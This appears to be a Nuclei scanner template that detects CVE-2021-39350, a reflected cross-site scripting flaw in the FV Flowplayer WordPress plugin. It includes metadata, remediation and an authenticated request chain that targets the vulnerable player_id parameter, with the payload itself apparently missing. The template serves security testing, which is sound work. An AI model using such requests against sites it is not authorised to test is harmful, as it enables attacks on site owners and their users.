id: CVE-2021-39350 info: name: FV Flowplayer Video Player WordPress plugin - Authenticated Cross-Site Scripting author: gy741 severity: medium description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts in versions 7.5.0.727 - 7.5.2.727. impact: | Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary JavaScript code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the FV Flowplayer Video Player WordPress plugin to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/e9adc166-be7f-4066-a2c1-7926c6304fc9 - https://nvd.nist.gov/vuln/detail/CVE-2021-39350 - https://plugins.trac.wordpress.org/changeset/2580834/fv-wordpress-flowplayer/trunk/view/stats.php - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39350 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-39350 cwe-id: CWE-79 epss-score: 0.00104 epss-percentile: 0.42206 cpe: cpe:2.3:a:foliovision:fv_flowplayer_video_player:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: foliovision product: fv_flowplayer_video_player framework: wordpress tags: cve2021,cve,wpscan,wordpress,xss,wp,wp-plugin,authenticated,foliovision http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=fv_player_stats&player_id=1 HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - "" - "

FV Player Stats

" condition: and - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a00483046022100e9544ea2a99ec897b7871a37a22dbe9bccc8b1ec287bd257eefcd143ba43c9b0022100cdfc5ef7b6494c579c2c558f7ea57a2811e5485f5f62b6070ae617a8b1b94dbd:922c64590222798bb761d5b6d8e72950